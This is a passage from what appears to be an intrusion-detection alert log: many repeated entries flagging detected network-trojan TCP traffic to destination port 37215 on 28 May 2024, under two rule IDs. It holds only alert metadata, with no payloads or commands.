            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919397
            SID:2835222
            Source Port:41864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.972336
            SID:2835222
            Source Port:53476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748626
            SID:2829579
            Source Port:45854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818839
            SID:2829579
            Source Port:46832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899033
            SID:2829579
            Source Port:60346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.993463
            SID:2829579
            Source Port:57240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919306
            SID:2829579
            Source Port:48854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769281
            SID:2829579
            Source Port:53884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665312
            SID:2829579
            Source Port:52410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.741936
            SID:2829579
            Source Port:40872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745550
            SID:2829579
            Source Port:54344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957303
            SID:2835222
            Source Port:50526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486927
            SID:2835222
            Source Port:43424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883834
            SID:2829579
            Source Port:42456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862107
            SID:2835222
            Source Port:41562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954687
            SID:2829579
            Source Port:60302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766623
            SID:2835222
            Source Port:37042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863453
            SID:2829579
            Source Port:45076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261218
            SID:2829579
            Source Port:41660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506407
            SID:2835222
            Source Port:38538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421694
            SID:2829579
            Source Port:53990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669872
            SID:2835222
            Source Port:60384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.005997
            SID:2829579
            Source Port:58580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855913
            SID:2835222
            Source Port:58126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.718999
            SID:2835222
            Source Port:44522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320509
            SID:2835222
            Source Port:42346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995927
            SID:2835222
            Source Port:47828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.753259
            SID:2835222
            Source Port:60824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251017
            SID:2835222
            Source Port:52970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824834
            SID:2835222
            Source Port:51354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918855
            SID:2835222
            Source Port:54198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821945
            SID:2835222
            Source Port:41868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930027
            SID:2829579
            Source Port:38514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745068
            SID:2835222
            Source Port:43660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051283
            SID:2835222
            Source Port:52592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861567
            SID:2829579
            Source Port:55834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882226
            SID:2829579
            Source Port:57524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.744209
            SID:2835222
            Source Port:47440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.027220
            SID:2835222
            Source Port:60922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965891
            SID:2829579
            Source Port:60966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075064
            SID:2835222
            Source Port:49684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.549980
            SID:2835222
            Source Port:49494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834505
            SID:2829579
            Source Port:35066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289341
            SID:2829579
            Source Port:60802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814346
            SID:2829579
            Source Port:36802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771581
            SID:2829579
            Source Port:33786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.613050
            SID:2829579
            Source Port:50378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067320
            SID:2829579
            Source Port:39136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310660
            SID:2829579
            Source Port:34526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654574
            SID:2835222
            Source Port:45226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.493988
            SID:2829579
            Source Port:35326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745915
            SID:2835222
            Source Port:38238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436550
            SID:2835222
            Source Port:55980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.849804
            SID:2835222
            Source Port:41952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697509
            SID:2835222
            Source Port:47830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052490
            SID:2835222
            Source Port:56002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.865386
            SID:2835222
            Source Port:49954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734425
            SID:2829579
            Source Port:53678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582840
            SID:2835222
            Source Port:46806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818257
            SID:2829579
            Source Port:60462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507068
            SID:2835222
            Source Port:44022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450861
            SID:2835222
            Source Port:57930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381416
            SID:2829579
            Source Port:46394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563432
            SID:2835222
            Source Port:54574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.076692
            SID:2835222
            Source Port:38450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.437031
            SID:2829579
            Source Port:56354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180814
            SID:2835222
            Source Port:40904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782367
            SID:2829579
            Source Port:46772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746439
            SID:2835222
            Source Port:50718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748394
            SID:2835222
            Source Port:58084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026493
            SID:2835222
            Source Port:46494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.767568
            SID:2829579
            Source Port:52236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.658285
            SID:2829579
            Source Port:34540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432575
            SID:2835222
            Source Port:36110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834520
            SID:2829579
            Source Port:59366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753199
            SID:2835222
            Source Port:56156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929271
            SID:2829579
            Source Port:49566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936345
            SID:2835222
            Source Port:33038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972524
            SID:2829579
            Source Port:50554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919026
            SID:2829579
            Source Port:35246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.670116
            SID:2835222
            Source Port:58902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307692
            SID:2835222
            Source Port:39524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.667053
            SID:2829579
            Source Port:40870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860429
            SID:2829579
            Source Port:58806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862241
            SID:2835222
            Source Port:54298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065014
            SID:2829579
            Source Port:34288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412772
            SID:2835222
            Source Port:54226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780556
            SID:2835222
            Source Port:35490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675543
            SID:2829579
            Source Port:48500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817452
            SID:2829579
            Source Port:51086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414308
            SID:2835222
            Source Port:49856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766924
            SID:2835222
            Source Port:37154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776197
            SID:2829579
            Source Port:39252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855318
            SID:2835222
            Source Port:39392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061205
            SID:2829579
            Source Port:49016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828257
            SID:2835222
            Source Port:36756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.842496
            SID:2835222
            Source Port:42022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.959287
            SID:2835222
            Source Port:58312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923542
            SID:2835222
            Source Port:50850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990770
            SID:2835222
            Source Port:40910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789518
            SID:2835222
            Source Port:39074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.910514
            SID:2835222
            Source Port:52624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771302
            SID:2835222
            Source Port:38820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756637
            SID:2835222
            Source Port:58630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.966665
            SID:2835222
            Source Port:47330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766872
            SID:2829579
            Source Port:44450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442335
            SID:2829579
            Source Port:57358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.661606
            SID:2829579
            Source Port:41064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058107
            SID:2835222
            Source Port:57388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857567
            SID:2829579
            Source Port:58798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279694
            SID:2835222
            Source Port:55022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772273
            SID:2835222
            Source Port:42784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789992
            SID:2829579
            Source Port:50910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957377
            SID:2835222
            Source Port:54242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924768
            SID:2835222
            Source Port:52964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839613
            SID:2835222
            Source Port:39718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291539
            SID:2835222
            Source Port:33286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969738
            SID:2829579
            Source Port:36660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300128
            SID:2829579
            Source Port:36194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848892
            SID:2829579
            Source Port:34186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064033
            SID:2829579
            Source Port:53704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508186
            SID:2829579
            Source Port:47336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066647
            SID:2835222
            Source Port:35362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.753791
            SID:2829579
            Source Port:43442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.731133
            SID:2835222
            Source Port:56574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068479
            SID:2829579
            Source Port:51338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854789
            SID:2835222
            Source Port:43286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057930
            SID:2835222
            Source Port:53966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856255
            SID:2829579
            Source Port:39464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.518013
            SID:2835222
            Source Port:34394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910279
            SID:2829579
            Source Port:40556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260855
            SID:2835222
            Source Port:37032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864701
            SID:2829579
            Source Port:54862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735647
            SID:2835222
            Source Port:53638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812578
            SID:2835222
            Source Port:49052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754694
            SID:2829579
            Source Port:37718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755798
            SID:2835222
            Source Port:35502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895990
            SID:2829579
            Source Port:54424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.307559
            SID:2829579
            Source Port:42644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059942
            SID:2829579
            Source Port:39776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342318
            SID:2835222
            Source Port:49698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.051841
            SID:2829579
            Source Port:56946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988065
            SID:2835222
            Source Port:44526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066153
            SID:2835222
            Source Port:55934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837850
            SID:2835222
            Source Port:50892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058439
            SID:2829579
            Source Port:60590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765694
            SID:2835222
            Source Port:32956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068454
            SID:2835222
            Source Port:55840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913511
            SID:2835222
            Source Port:44148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.062656
            SID:2835222
            Source Port:39120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954607
            SID:2835222
            Source Port:38602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782306
            SID:2835222
            Source Port:54710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917655
            SID:2835222
            Source Port:48334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869892
            SID:2835222
            Source Port:34996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555381
            SID:2835222
            Source Port:58036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767111
            SID:2829579
            Source Port:42974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996059
            SID:2829579
            Source Port:57820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860746
            SID:2835222
            Source Port:49852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.859434
            SID:2835222
            Source Port:38996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.940795
            SID:2835222
            Source Port:52716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777630
            SID:2829579
            Source Port:42330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335353
            SID:2835222
            Source Port:50068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341077
            SID:2835222
            Source Port:49112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924890
            SID:2829579
            Source Port:53894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853282
            SID:2835222
            Source Port:35096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868391
            SID:2835222
            Source Port:48296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.964260
            SID:2835222
            Source Port:36362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849207
            SID:2835222
            Source Port:45340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943730
            SID:2829579
            Source Port:41894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334129
            SID:2835222
            Source Port:50476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.725033
            SID:2835222
            Source Port:35280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421627
            SID:2835222
            Source Port:39896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863018
            SID:2835222
            Source Port:58650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930266
            SID:2835222
            Source Port:49250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712904
            SID:2829579
            Source Port:58766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824557
            SID:2835222
            Source Port:54258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818339
            SID:2829579
            Source Port:45670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.563804
            SID:2835222
            Source Port:59662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927016
            SID:2835222
            Source Port:52852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412734
            SID:2829579
            Source Port:41942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.739149
            SID:2829579
            Source Port:52608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012452
            SID:2829579
            Source Port:58176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.488090
            SID:2835222
            Source Port:43380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029842
            SID:2835222
            Source Port:41914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687603
            SID:2829579
            Source Port:58424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.385555
            SID:2835222
            Source Port:49874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.729354
            SID:2829579
            Source Port:37706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730234
            SID:2829579
            Source Port:41224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922344
            SID:2835222
            Source Port:56090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307425
            SID:2829579
            Source Port:57186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730108
            SID:2829579
            Source Port:44000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.896207
            SID:2829579
            Source Port:49650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774811
            SID:2835222
            Source Port:52972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916979
            SID:2829579
            Source Port:57478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.582006
            SID:2829579
            Source Port:51066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860733
            SID:2835222
            Source Port:57410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045109
            SID:2829579
            Source Port:60588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
